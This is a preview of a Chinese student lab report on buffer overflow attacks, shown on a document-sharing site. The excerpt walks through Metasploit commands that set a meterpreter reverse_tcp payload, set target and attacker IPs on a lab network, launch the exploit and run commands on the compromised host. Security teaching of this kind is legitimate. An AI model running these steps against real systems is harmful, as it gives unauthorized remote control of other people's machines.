全文预览

缓冲区溢出攻击与防范实验报告

上传者:读书之乐 |  格式:doc  |  页数:20 |  大小:1268KB

文档介绍
show payloads来查找一下吧!Р然后用set命令选择一旦利用漏洞渗透进去使用什么攻击载荷,这里使用MSF框架里功能强大的Meterpreter攻击模块下的反向连接shell载荷,使用命令:set payload windows/meterpreter/reverse_tcp,执行如图6所示。Р图6 选择攻击载荷Р完成渗透攻击模块与攻击载荷模块的选择之后,需要查看配置渗透攻击所需的配置选项,具体命令如下:show optionsР用show options命令查看还有哪些参数需要配置,根据目标情况配置渗透攻击的选项。如图7所示:Р图7 需要配置的参数Рnow,现在我们需要设置ip咯,设置命令:set RHOST 192.168.56.101 set LHOST 172.18.7.191配置本地攻击机和远程靶机的IP地址,如图8所示Р图8配置参数Р现在呢,我们基本已设置完成,接下来我们show一下看看自己的配置都在不?确认一下信息:(看到了吧,我们的配置没问题吧!Ip都有了啊!!!)Р图9 检查配置参数Р所有需要的参数配置好了以后,在进行exploit渗透攻击时,会出现一些状况,有可能渗透不成功,需要在这时候谨慎。用exploit或run命令发动攻击,如图10所示,渗透成功后,设置的回连主机就是Metasploit攻击主机,攻击主机会获得一个meterpreter控制会话session。Р图10 成功获取sessionР吼吼!!!成功了!!!已成功拿下对方主机,那么现在你要做什么呢?好的,告诉你一句话:好戏开锣咯···是时候让你体验一下当黑客的感觉了!Hello,hacker还等什么呢?好吧,废话少说,第一个“破坏”玩起!哈哈!Р实例1 从靶机拿到的ipconfig/all,如图11Р图11从靶机拿到的ipconfig/allР实例2获得系统当前的进程列表,如图12:

收藏

分享

举报
下载此文档